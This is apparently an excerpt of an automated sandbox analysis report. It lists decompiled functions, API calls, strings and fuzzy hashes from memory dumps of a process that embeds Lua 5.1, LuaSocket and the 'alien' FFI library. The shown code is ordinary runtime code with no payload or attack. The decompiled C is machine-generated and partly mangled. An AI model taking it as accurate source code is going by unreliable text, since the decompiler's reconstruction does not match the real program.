				_t22 = __eflags;
				_t17 = _a4;
				E100013D0(__eflags, _a4, 0xffffd8ee);
				E10001DD0(_t16, _t22, _t17, 0xffffd8ee, "_G");
				E1000F6F0(_t17, "_G", 0x10017540);
				E10001930(_t17, "Lua 5.1", 7);
				E10001DD0(_t16, _t22, _t17, 0xffffd8ee, "_VERSION");
				E10011280(_t17, "ipairs", E10011160, E10011120);
				E10011280(_t17, "pairs", E100110E0, E10010770);
				E10001C70(_t17, 0, 1);
				E100013D0(_t22, _t17, 0xffffffff);
				E10001F20(_t22, _t17, 0xfffffffe);
				E10001930(_t17, "kv", 2);
				E10001DD0(_t16, _t22, _t17, 0xfffffffe, "__mode");
				E10001A20(_t17, E100111A0, 1);
				return E10001DD0(_t16, _t22, _t17, 0xffffd8ee, "newproxy");
			}

0x10011000
0x10011001
0x1001100b
0x1001101b
0x1001102b
0x10011038
0x10011048
0x1001105d
0x10011075
0x1001107f
0x10011087
0x1001108f
0x1001109c
0x100110a9
0x100110b9
0x100110d2

APIs

lua_pushvalue.LUA5.1(?,FFFFD8EE,?,10010FDB,?), ref: 1001100B
lua_setfield.LUA5.1(?,FFFFD8EE,10019FAC,?,FFFFD8EE,?,10010FDB,?), ref: 1001101B

Part of subcall function 10001DD0: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001DFA

luaL_register.LUA5.1(?,10019FAC,10017540,?,FFFFD8EE,10019FAC,?,FFFFD8EE,?,10010FDB,?), ref: 1001102B

Part of subcall function 1000F6F0: luaL_openlib.LUA5.1(?,?,?,00000000), ref: 1000F701

lua_pushlstring.LUA5.1(?,Lua 5.1,00000007,?,10019FAC,10017540,?,FFFFD8EE,10019FAC,?,FFFFD8EE,?,10010FDB,?), ref: 10011038

Part of subcall function 10001930: luaS_newlstr.LUA5.1(?,?,?), ref: 1000195A

lua_setfield.LUA5.1(?,FFFFD8EE,_VERSION,?,Lua 5.1,00000007,?,10019FAC,10017540,?,FFFFD8EE,10019FAC,?,FFFFD8EE,?,10010FDB), ref: 10011048

Part of subcall function 10011280: lua_pushcclosure.LUA5.1(?,?,00000000,?,10011062,?,ipairs,10011160,10011120,?,FFFFD8EE,_VERSION,?,Lua 5.1,00000007,?), ref: 1001128D
Part of subcall function 10011280: lua_pushcclosure.LUA5.1(?,?,00000001,?,?,00000000,?,10011062,?,ipairs,10011160,10011120,?,FFFFD8EE,_VERSION,?), ref: 1001129A
Part of subcall function 10011280: lua_setfield.LUA5.1(?,000000FE,?,?,?,00000001,?,?,00000000,?,10011062,?,ipairs,10011160,10011120,?), ref: 100112A7

lua_createtable.LUA5.1(?,00000000,00000001,?,pairs,100110E0,10010770), ref: 1001107F
lua_pushvalue.LUA5.1(?,000000FF,?,00000000,00000001,?,pairs,100110E0,10010770), ref: 10011087
lua_setmetatable.LUA5.1(?,000000FE,?,000000FF,?,00000000,00000001,?,pairs,100110E0,10010770), ref: 1001108F
lua_pushlstring.LUA5.1(?,10019F84,00000002,?,000000FE,?,000000FF,?,00000000,00000001,?,pairs,100110E0,10010770), ref: 1001109C
lua_setfield.LUA5.1(?,000000FE,__mode,?,10019F84,00000002,?,000000FE,?,000000FF,?,00000000,00000001,?,pairs,100110E0), ref: 100110A9
lua_pushcclosure.LUA5.1(?,100111A0,00000001), ref: 100110B9
lua_setfield.LUA5.1(?,FFFFD8EE,newproxy,?,100111A0,00000001), ref: 100110C9

Strings

_VERSION, xrefs: 1001103D
ipairs, xrefs: 10011057
Lua 5.1, xrefs: 10011032
newproxy, xrefs: 100110BE
pairs, xrefs: 1001106F
__mode, xrefs: 100110A1

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_setfield.$lua_pushcclosure.$S_newlstr.lua_pushlstring.lua_pushvalue.$L_openlib.L_register.lua_createtable.lua_setmetatable.
String ID: Lua 5.1$_VERSION$__mode$ipairs$newproxy$pairs
API String ID: 1415721450-69921249
Opcode ID: 3cf02260c5ebc5e58269b459de67b0a9c4bc09a7b66f750800428e6c0a40495a
Instruction ID: 773b636c6f64b343c4a146835389539241168f83d6492849bc4b82b4ec95bc8f
Opcode Fuzzy Hash: 3cf02260c5ebc5e58269b459de67b0a9c4bc09a7b66f750800428e6c0a40495a
Instruction Fuzzy Hash: 4D01F63899E93435E946E2656D03FCE1009CF536E4F200224F324BD5DA6BBAB2D310EE

Uniqueness

Uniqueness Score: -1.00%

Function 00401950, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

Part of subcall function 00401180: luaL_checkstack.LUA5.1(?,-00000004,too many arguments to script), ref: 004011B3
Part of subcall function 00401180: lua_pushstring.LUA5.1(?,00000000), ref: 004011C8
Part of subcall function 00401180: lua_createtable.LUA5.1(?,?,?), ref: 004011E5
Part of subcall function 00401180: lua_pushstring.LUA5.1 ref: 00401206
Part of subcall function 00401180: lua_rawseti.LUA5.1(?,000000FE,?), ref: 00401213

lua_setfield.LUA5.1(?,FFFFD8EE,arg,?,?), ref: 00401972
luaL_loadfile.LUA5.1(?,00000000), ref: 004019AF
lua_insert.LUA5.1(?,00000000,?,00000000), ref: 004019BD
lua_gettop.LUA5.1 ref: 004019CA
lua_pushcclosure.LUA5.1(?,Function_000010B0,00000000), ref: 004019DA
lua_insert.LUA5.1(?,00000000,?,Function_000010B0,00000000), ref: 004019E1
signal.MSVCR80 ref: 004019F3
lua_pcall.LUA5.1(?,00000000,000000FF,00000000,?,00000000,?,Function_000010B0,00000000), ref: 004019FA
signal.MSVCR80 ref: 00401A05
lua_remove.LUA5.1(?,00000000,?,00000000,000000FF,00000000,?,00000000,?,Function_000010B0,00000000), ref: 00401A09
lua_gc.LUA5.1(?,00000002,00000000), ref: 00401A1A
lua_settop.LUA5.1(?,00000000), ref: 00401A28
lua_type.LUA5.1(?,000000FF), ref: 00401A37
lua_tolstring.LUA5.1(?,000000FF,00000000), ref: 00401A48
lua_settop.LUA5.1(?,000000FE,00000000), ref: 00401A67

Strings

arg, xrefs: 00401965
(error object is not a string), xrefs: 00401A54, 00401A59

Memory Dump Source

Source File: 00000003.00000002.481771819.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.481676145.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481875011.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481973747.0000000000405000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_insert.lua_pushstring.lua_settop.signal$L_checkstack.L_loadfile.lua_createtable.lua_gc.lua_gettop.lua_pcall.lua_pushcclosure.lua_rawseti.lua_remove.lua_setfield.lua_tolstring.lua_type.
String ID: (error object is not a string)$arg
API String ID: 3477668877-1766022967
Opcode ID: be739a6609840a202dd472d8a26ed19aeb878c08de70b328747767e5f0475913
Instruction ID: 853f7559fa79c99730b05bb0d689d5a4a189139a5acb4b195112fa24ab6b3a8e
Opcode Fuzzy Hash: be739a6609840a202dd472d8a26ed19aeb878c08de70b328747767e5f0475913
Instruction Fuzzy Hash: EA3105B2B0421533D620B67A5C42F2B354D8B813B5F25023ABE25B73E2EA7DAD0041BD

Uniqueness

Uniqueness Score: -1.00%

Function 100111A0, Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100111A0(void* __ebx, void* __edi, void* __eflags, void* __fp0, intOrPtr _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t12;
				void* _t20;
				void* _t34;

				_t34 = __eflags;
				_t20 = __ebx;
				_t24 = _a4;
				E10001160(_a4, 1);
				E100024A0(_a4, 0);
				_t4 = E100016C0(_t34, _a4, 1);
				_t35 = _t4;
				if(_t4 == 0) {
					L7:
					return 1;
				} else {
					_t6 = E10001410(_t35, _t24, 1);
					_t36 = _t6 - 1;
					if(_t6 != 1) {
						__eflags = E10001CC0(__eflags, _t24, 1);
						if(__eflags == 0) {
							L5:
							E1000F090(_t20, _t24, __eflags, _t24, 1, "boolean or proxy expected");
						} else {
							E10001BF0(__eflags, __fp0, _t24, 0xffffd8ed);
							_t12 = E100016C0(__eflags, _t24, 0xffffffff);
							E10001160(_t24, 0xfffffffe);
							__eflags = _t12;
							if(__eflags == 0) {
								goto L5;
							}
						}
						E10001CC0(__eflags, _t24, 1);
						E10001F20(__eflags, _t24, 2);
						goto L7;
					} else {
						E10001C70(_t24, 0, 0);
						E100013D0(_t36, _t24, 0xffffffff);
						E10001AE0(_t24, 1);
						E10001E40(_t36, _t24, 0xffffd8ed);
						E10001F20(_t36, _t24, 2);
						return 1;
					}
				}
			}

0x100111a0
0x100111a0
0x100111a1
0x100111a8
0x100111b0
0x100111b8
0x100111c0
0x100111c2
0x1001126d
0x10011273
0x100111c8
0x100111cb
0x100111d3
0x100111d6
0x1001121d
0x1001121f
0x10011247
0x1001124f
0x10011221
0x10011228
0x10011230
0x1001123a
0x10011242
0x10011245
0x00000000
0x00000000
0x10011245
0x1001125a
0x10011265
0x00000000
0x100111d8
0x100111dd
0x100111e5
0x100111ed
0x100111f8
0x10011203
0x10011211
0x10011211
0x100111d6

APIs

lua_settop.LUA5.1(?,00000001), ref: 100111A8
lua_newuserdata.LUA5.1(?,00000000,?,00000001), ref: 100111B0
lua_toboolean.LUA5.1(?,00000001,?,00000000,?,00000001), ref: 100111B8
lua_type.LUA5.1(?,00000001), ref: 100111CB
lua_createtable.LUA5.1(?,00000000,00000000), ref: 100111DD
lua_pushvalue.LUA5.1(?,000000FF,?,00000000,00000000), ref: 100111E5
lua_pushboolean.LUA5.1(?,00000001,?,000000FF,?,00000000,00000000), ref: 100111ED
lua_rawset.LUA5.1(?,FFFFD8ED,?,00000001,?,000000FF,?,00000000,00000000), ref: 100111F8
lua_setmetatable.LUA5.1(?,00000002), ref: 10011203
lua_getmetatable.LUA5.1(?,00000001), ref: 10011215
lua_rawget.LUA5.1(?,FFFFD8ED), ref: 10011228
lua_toboolean.LUA5.1(?,000000FF,?,FFFFD8ED), ref: 10011230
lua_settop.LUA5.1(?,000000FE,?,000000FF,?,FFFFD8ED), ref: 1001123A
luaL_argerror.LUA5.1(?,00000001,boolean or proxy expected), ref: 1001124F
lua_getmetatable.LUA5.1(?,00000001), ref: 1001125A
lua_setmetatable.LUA5.1(?,00000002), ref: 10011265

Strings

boolean or proxy expected, xrefs: 10011247

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_getmetatable.lua_setmetatable.lua_settop.lua_toboolean.$L_argerror.lua_createtable.lua_newuserdata.lua_pushboolean.lua_pushvalue.lua_rawget.lua_rawset.lua_type.
String ID: boolean or proxy expected
API String ID: 1269277057-1864144190
Opcode ID: 224b3c9822cfd41598f06e1161bdbea53d51368e6180c24bf4769ed057e4335d
Instruction ID: d7b02b31a26ba1415f514f340cc9e535dfe3c304a60d9c943ede91cf9e99454d
Opcode Fuzzy Hash: 224b3c9822cfd41598f06e1161bdbea53d51368e6180c24bf4769ed057e4335d
Instruction Fuzzy Hash: 1B11127DA9552131F812A1246C43FDF1049CF537E5F540120FA14B92DBEAAAB69201EF

Uniqueness

Uniqueness Score: -1.00%

Function 00992980, Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E00992980(short __eax, char _a4, short _a6, intOrPtr _a8) {
				short _t6;
				char _t10;
				void* _t11;
				void* _t12;
				void* _t13;
				void* _t14;

				_t6 = __eax;
				_t10 = _a4;
				_push(3);
				_push(_t10);
				L00994AFA();
				_t12 = _t11 + 8;
				if(__eax != 5) {
					_push(5);
					_push(_t10);
					L00994B24();
					_push(__eax);
					_push(3);
					_push(_t10);
					L00994B1E();
					_t12 = _t12 + 0x14;
				}
				_push("on");
				_push(_t10);
				L00994AD0();
				_push(3);
				_push(_t10);
				L00994B00();
				_push(0xffffffff);
				_push(_t10);
				L00994AFA();
				_t13 = _t12 + 0x18;
				if(_t6 != 1) {
					_push("boolean \'on\' field expected");
					_push(3);
					_push(_t10);
					L00994B2A();
					_t13 = _t13 + 0xc;
				}
				_push(0xffffffff);
				_push(_t10);
				L00994B18();
				_push("timeout");
				_push(_t10);
				_a4 = _t6;
				L00994AD0();
				_push(3);
				_push(_t10);
				L00994B00();
				_push(0xffffffff);
				_push(_t10);
				L00994B84();
				_t14 = _t13 + 0x20;
				if(_t6 == 0) {
					_push("number \'timeout\' field expected");
					_push(3);
					_push(_t10);
					L00994B2A();
					_t14 = _t14 + 0xc;
				}
				_push(0xffffffff);
				_push(_t10);
				L00994B7E();
				L00994BD0();
				_a6 = _t6;
				_push(4);
				return E00992C40(_t10, _a8, 0xffff, 0x80,  &_a4);
			}

0x00992980
0x00992981
0x00992985
0x00992987
0x00992988
0x0099298d
0x00992993
0x00992995
0x00992997
0x00992998
0x0099299d
0x0099299e
0x009929a0
0x009929a1
0x009929a6
0x009929a6
0x009929a9
0x009929ae
0x009929af
0x009929b4
0x009929b6
0x009929b7
0x009929bc
0x009929be
0x009929bf
0x009929c4
0x009929ca
0x009929cc
0x009929d1
0x009929d3
0x009929d4
0x009929d9
0x009929d9
0x009929dc
0x009929de
0x009929df
0x009929e4
0x009929e9
0x009929ea
0x009929ef
0x009929f4
0x009929f6
0x009929f7
0x009929fc
0x009929fe
0x009929ff
0x00992a04
0x00992a09
0x00992a0b
0x00992a10
0x00992a12
0x00992a13
0x00992a18
0x00992a18
0x00992a1b
0x00992a1d
0x00992a1e
0x00992a23
0x00992a2c
0x00992a35
0x00992a4d

APIs

lua_type.LUA5.1(?,00000003), ref: 00992988
lua_typename.LUA5.1(?,00000005), ref: 00992998
luaL_typerror.LUA5.1(?,00000003,00000000,?,00000005), ref: 009929A1
lua_pushstring.LUA5.1(?,009963E4), ref: 009929AF
lua_gettable.LUA5.1(?,00000003,?,009963E4), ref: 009929B7
lua_type.LUA5.1(?,000000FF,?,00000003,?,009963E4), ref: 009929BF
luaL_argerror.LUA5.1(?,00000003,boolean 'on' field expected), ref: 009929D4
lua_toboolean.LUA5.1(?,000000FF), ref: 009929DF
lua_pushstring.LUA5.1(?,timeout,?,000000FF), ref: 009929EF
lua_gettable.LUA5.1(?,00000003,?,timeout,?,000000FF), ref: 009929F7
lua_isnumber.LUA5.1(?,000000FF,?,00000003,?,timeout,?,000000FF), ref: 009929FF
luaL_argerror.LUA5.1(?,00000003,number 'timeout' field expected), ref: 00992A13
lua_tonumber.LUA5.1(?,000000FF), ref: 00992A1E
_ftol.MSVCRT ref: 00992A23

Strings

timeout, xrefs: 009929E4
boolean 'on' field expected, xrefs: 009929CC
number 'timeout' field expected, xrefs: 00992A0B

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.lua_gettable.lua_pushstring.lua_type.$L_typerror._ftollua_isnumber.lua_toboolean.lua_tonumber.lua_typename.
String ID: boolean 'on' field expected$number 'timeout' field expected$timeout
API String ID: 8799443-3541150494
Opcode ID: 4ccc9153e766ca134db05a94d85def528c1d2cb9b4677e2df6296cfefc59aa17
Instruction ID: e561113a14a0f42910939e8e460db7c9a5154917e028eb6716a19371f4047268
Opcode Fuzzy Hash: 4ccc9153e766ca134db05a94d85def528c1d2cb9b4677e2df6296cfefc59aa17
Instruction Fuzzy Hash: 7B116D61A8A72136ED27772CAC13F9F214C4FA6729F140701F560752D3BA84975742EF

Uniqueness

Uniqueness Score: -1.00%

Function 009910B0, Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E009910B0(void* __eax, intOrPtr _a4) {
				char _v32;
				int _t7;
				intOrPtr _t10;
				char* _t12;

				_t10 = _a4;
				_push(1);
				_push(_t10);
				L00994B06();
				_t12 =  &(( &_v32)[8]);
				if(__eax == 0) {
					L3:
					_push("invalid object passed to \'auxiliar.c:__tostring\'");
					_push(_t10);
					L00994AD0();
					_push(_t10);
					L00994AEE();
					return 1;
				} else {
					_push("__index");
					_push(_t10);
					L00994AD0();
					_push(0xfffffffe);
					_push(_t10);
					L00994B00();
					_push(0xffffffff);
					_push(_t10);
					L00994AFA();
					_t12 =  &(_t12[0x18]);
					if(__eax != 5) {
						goto L3;
					} else {
						_push("class");
						_push(_t10);
						L00994AD0();
						_push(0xfffffffe);
						_push(_t10);
						L00994B00();
						_push(0xffffffff);
						_push(_t10);
						L00994AF4();
						_t12 =  &(_t12[0x18]);
						if(__eax != 0) {
							_push(1);
							_push(_t10);
							L00994AE8();
							_t7 = sprintf( &_v32, "%p", __eax);
							_push( &_v32);
							_push(0);
							_push(0xffffffff);
							_push(_t10);
							L00994AE2();
							_push(_t7);
							_push("%s: %s");
							_push(_t10);
							L00994ADC();
							return 1;
						} else {
							goto L3;
						}
					}
				}
			}

0x009910b4
0x009910b8
0x009910ba
0x009910bb
0x009910c0
0x009910c5
0x0099110c
0x0099110c
0x00991111
0x00991112
0x00991117
0x00991118
0x00991129
0x009910c7
0x009910c7
0x009910cc
0x009910cd
0x009910d2
0x009910d4
0x009910d5
0x009910da
0x009910dc
0x009910dd
0x009910e2
0x009910e8
0x00000000
0x009910ea
0x009910ea
0x009910ef
0x009910f0
0x009910f5
0x009910f7
0x009910f8
0x009910fd
0x009910ff
0x00991100
0x00991105
0x0099110a
0x0099112a
0x0099112c
0x0099112d
0x0099113d
0x0099114a
0x0099114b
0x0099114d
0x0099114f
0x00991150
0x00991158
0x00991159
0x0099115e
0x0099115f
0x00991170
0x00000000
0x00000000
0x00000000
0x0099110a
0x009910e8

APIs

lua_getmetatable.LUA5.1(?,00000001), ref: 009910BB
lua_pushstring.LUA5.1(?,__index), ref: 009910CD
lua_gettable.LUA5.1(?,000000FE,?,__index), ref: 009910D5
lua_type.LUA5.1(?,000000FF,?,000000FE,?,__index), ref: 009910DD
lua_pushstring.LUA5.1(?,class), ref: 009910F0
lua_gettable.LUA5.1(?,000000FE,?,class), ref: 009910F8
lua_isstring.LUA5.1(?,000000FF,?,000000FE,?,class), ref: 00991100
lua_pushstring.LUA5.1(?,invalid object passed to 'auxiliar.c:__tostring'), ref: 00991112
lua_error.LUA5.1(?,?,invalid object passed to 'auxiliar.c:__tostring'), ref: 00991118
lua_touserdata.LUA5.1(?,00000001), ref: 0099112D
sprintf.MSVCRT ref: 0099113D
lua_tolstring.LUA5.1(?,000000FF,00000000,?), ref: 00991150
lua_pushfstring.LUA5.1(?,%s: %s,00000000,?,?,?), ref: 0099115F

Strings

%s: %s, xrefs: 00991159
__index, xrefs: 009910C7
class, xrefs: 009910EA
invalid object passed to 'auxiliar.c:__tostring', xrefs: 0099110C

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushstring.$lua_gettable.$lua_error.lua_getmetatable.lua_isstring.lua_pushfstring.lua_tolstring.lua_touserdata.lua_type.sprintf
String ID: %s: %s$__index$class$invalid object passed to 'auxiliar.c:__tostring'
API String ID: 3178485661-3452857538
Opcode ID: 3cf5f8a237e9a94cda29d3e1c443859458d59ec2c78f0d6c98f3ffdbef3dc9f1
Instruction ID: 3851fd3a6b3dadb18430599af5dbbc5e71ae015dd955f76d2c8074787a680dbf
Opcode Fuzzy Hash: 3cf5f8a237e9a94cda29d3e1c443859458d59ec2c78f0d6c98f3ffdbef3dc9f1
Instruction Fuzzy Hash: 36016D7198A62132DD22B26D1C83FDF210C9FA6329F540750F535711D2EA49A66641EF

Uniqueness

Uniqueness Score: -1.00%

Function 009C1C90, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E009C1C90(intOrPtr __eax, long long __fp0, intOrPtr _a4) {
				char _v0;
				void* _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				char _v536;
				intOrPtr _v540;
				intOrPtr* _t30;
				intOrPtr _t35;
				intOrPtr _t42;
				char _t43;
				intOrPtr* _t55;
				intOrPtr _t57;
				void* _t59;
				long long* _t60;
				long long _t66;

				_t66 = __fp0;
				_t57 = _a4;
				_push(1);
				_push(_t57);
				_v536 = 0;
				L009C2132();
				L009C2150();
				_t56 = __eax;
				_t30 =  &_v536;
				_push(_t30);
				_push(0);
				_push(2);
				_push(_t57);
				_v540 = __eax;
				L009C212C();
				_t43 = _v536;
				_t55 = _t30;
				_push(0x40530000);
				_push(0);
				_push(3);
				_push(_t57);
				_v532 = _t55 + _t43;
				L009C2126();
				_t59 =  &_v540 + 0x28;
				L009C2150();
				_t42 = _t30;
				_v528 = _t42;
				if(_t55 != 0) {
					_push( &_v524);
					_push(_t57);
					L009C211A();
					_t60 = _t59 + 8;
					if(_t55 >= _v532) {
						L21:
						_push( &_v524);
						L009C2108();
						asm("fild dword [esp+0x14]");
						_push(_t43);
						goto L22;
					} else {
						goto L5;
					}
					do {
						L5:
						_t35 =  *_t55;
						if(_t35 == 0xa) {
							_push(0x9c3064);
							_push( &_v524);
							_t56 = _t42;
							L009C2114();
							_t60 = _t60 + 8;
						} else {
							if(_t35 != 0xd) {
								if(_t35 == 0x3d) {
									if(_t56 <= 3) {
										_push("=");
										_push( &_v524);
										_t56 = _t42;
										L009C2114();
										_t60 = _t60 + 8;
									}
									if(_v524 >=  &_v0) {
										_push( &_v524);
										L009C210E();
										_t60 = _t60 + 4;
									}
									 *_v524 =  *_t55;
									_t43 = _v524 + 1;
									_t56 = _t56 - 1;
									_v524 = _t43;
								} else {
									if(_t56 <= 1) {
										_push("=");
										_push( &_v524);
										_t56 = _t42;
										L009C2114();
										_t60 = _t60 + 8;
									}
									if(_v524 >=  &_v0) {
										_push( &_v524);
										L009C210E();
										_t60 = _t60 + 4;
									}
									 *_v524 =  *_t55;
									_t43 = _v524 + 1;
									_t56 = _t56 - 1;
									_v524 = _t43;
								}
							}
						}
						_t55 = _t55 + 1;
					} while (_t55 < _v532);
					_v540 = _t56;
					goto L21;
				} else {
					if(__eax >= _t42) {
						_push(_t57);
						L009C2120();
						asm("fild dword [esp+0x20]");
						_t60 = _t59 + 4 - 8;
					} else {
						_push("=");
						_push(_t57);
						L009C20F6();
						asm("fild dword [esp+0x24]");
						_t60 = _t59 + 8 - 8;
					}
					L22:
					 *_t60 = _t66;
					_push(_t57);
					L009C2102();
					return 2;
				}
			}

0x009c1c90
0x009c1c98
0x009c1ca1
0x009c1ca3
0x009c1ca4
0x009c1cac
0x009c1cb1
0x009c1cb6
0x009c1cb8
0x009c1cbc
0x009c1cbd
0x009c1cbf
0x009c1cc1
0x009c1cc2
0x009c1cc6
0x009c1ccb
0x009c1ccf
0x009c1cd1
0x009c1cd6
0x009c1cdb
0x009c1cdd
0x009c1cde
0x009c1ce2
0x009c1ce7
0x009c1cea
0x009c1cef
0x009c1cf3
0x009c1cf7
0x009c1d30
0x009c1d31
0x009c1d32
0x009c1d3b
0x009c1d40
0x009c1e13
0x009c1e17
0x009c1e18
0x009c1e1d
0x009c1e21
0x00000000
0x00000000
0x00000000
0x00000000
0x009c1d46
0x009c1d46
0x009c1d46
0x009c1d4a
0x009c1df2
0x009c1df7
0x009c1df8
0x009c1dfa
0x009c1dff
0x009c1d50
0x009c1d52
0x009c1d5a
0x009c1da8
0x009c1dae
0x009c1db3
0x009c1db4
0x009c1db6
0x009c1dbb
0x009c1dbb
0x009c1dcb
0x009c1dd1
0x009c1dd2
0x009c1dd7
0x009c1dd7
0x009c1de0
0x009c1de6
0x009c1de7
0x009c1de8
0x009c1d5c
0x009c1d5f
0x009c1d65
0x009c1d6a
0x009c1d6b
0x009c1d6d
0x009c1d72
0x009c1d72
0x009c1d82
0x009c1d88
0x009c1d89
0x009c1d8e
0x009c1d8e
0x009c1d97
0x009c1d9d
0x009c1d9e
0x009c1d9f
0x009c1d9f
0x009c1d5a
0x009c1d52
0x009c1e06
0x009c1e07
0x009c1e0f
0x00000000
0x009c1cf9
0x009c1cfb
0x009c1d17
0x009c1d18
0x009c1d1d
0x009c1d24
0x009c1cfd
0x009c1cfd
0x009c1d02
0x009c1d03
0x009c1d08
0x009c1d0f
0x009c1d0f
0x009c1e22
0x009c1e22
0x009c1e25
0x009c1e26
0x009c1e3d
0x009c1e3d

APIs

luaL_checknumber.LUA5.1 ref: 009C1CAC
_ftol.MSVCRT ref: 009C1CB1
luaL_optlstring.LUA5.1(?,00000002,00000000,00000000), ref: 009C1CC6
luaL_optnumber.LUA5.1(?,00000003,00000000,40530000,?,00000002,00000000,00000000), ref: 009C1CE2
_ftol.MSVCRT ref: 009C1CEA
lua_pushstring.LUA5.1(?,=,?,?,?,?,?,00000001), ref: 009C1D03
lua_pushnil.LUA5.1(?,?,?,?,?,?,00000001), ref: 009C1D18
luaL_buffinit.LUA5.1(?,?,?,?,?,?,?,00000001), ref: 009C1D32
luaL_addstring.LUA5.1(?,=,?,?,?,?,?,?,?,00000001), ref: 009C1D6D
luaL_prepbuffer.LUA5.1(?,?,?,?,?,?,?,?,00000001), ref: 009C1D89
luaL_pushresult.LUA5.1(?,?,?,?,?,?,?,?,00000001), ref: 009C1E18
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,00000001), ref: 009C1E26

Strings

=, xrefs: 009C1CFD, 009C1D65, 009C1DAE

Memory Dump Source

Source File: 00000003.00000002.486890418.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000003.00000002.486863680.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486943477.00000000009C3000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486972534.00000000009C4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487005169.00000000009C5000.00000002.00020000.sdmp Download File

Similarity

API ID: _ftol$L_addstring.L_buffinit.L_checknumber.L_optlstring.L_optnumber.L_prepbuffer.L_pushresult.lua_pushnil.lua_pushnumber.lua_pushstring.
String ID: =
API String ID: 1905715778-2257139842
Opcode ID: 9a2d022e41aacc5bf1eb55dd2566bde45144ae09467962189361628c9b4b16d0
Instruction ID: b387229e6993e585a795d642794792e44ce2c7f5a764c3fc735552d9f55451e2
Opcode Fuzzy Hash: 9a2d022e41aacc5bf1eb55dd2566bde45144ae09467962189361628c9b4b16d0
Instruction Fuzzy Hash: 7B418672D083455BC314EB149C42F6FB7E8BBD9304F584A2DF9CA93242DA74DA058797

Uniqueness

Uniqueness Score: -1.00%

Function 00A21990, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00A21990(intOrPtr _a4) {
				void* _v4;
				void* _t17;
				void _t19;
				void* _t21;
				void* _t22;
				void* _t25;
				void* _t27;
				intOrPtr _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;

				_t33 = _a4;
				_push(6);
				_push(1);
				_push(_t33);
				L00A23F92();
				_t17 = malloc(0x40);
				_push(4);
				_push(_t33);
				_t34 = _t17;
				L00A23F2C();
				_t37 = _t36 + 0x18;
				_t25 = _t17;
				_v4 = _t25;
				if(_t34 == 0) {
					L14:
					_push("alien: cannot allocate callback");
					_push(_t33);
					L00A23F26();
					return 0;
				} else {
					if(_t25 == 0) {
						free(_t34);
						_t37 = _t37 + 4;
						goto L14;
					} else {
						_t19 =  *0xa27108; // 0x0
						if(_t19 != 0) {
							L5:
							 *0xa27108 =  *_t19;
						} else {
							E00A21000();
							_t19 =  *0xa27108; // 0x0
							if(_t19 != 0) {
								goto L5;
							} else {
								_t19 = 0;
							}
						}
						 *_t25 = _t19;
						if(_t19 == 0) {
							free(_t34);
							_push("alien: cannot allocate callback");
							_push(_t33);
							L00A23F26();
							_t37 = _t37 + 0xc;
						}
						_push(1);
						_push(_t33);
						 *((intOrPtr*)(_t34 + 0x38)) = _t33;
						 *((intOrPtr*)(_t34 + 0xc)) = 6;
						 *((intOrPtr*)(_t34 + 0x28)) = 0xa2705c;
						 *((intOrPtr*)(_t34 + 0x2c)) = 0;
						 *((intOrPtr*)(_t34 + 0x30)) = 0;
						 *((intOrPtr*)(_t34 + 0x34)) = 0;
						L00A23F44();
						_push(0xffffd8f0);
						_push(_t33);
						L00A23F8C();
						_push("alien_callback");
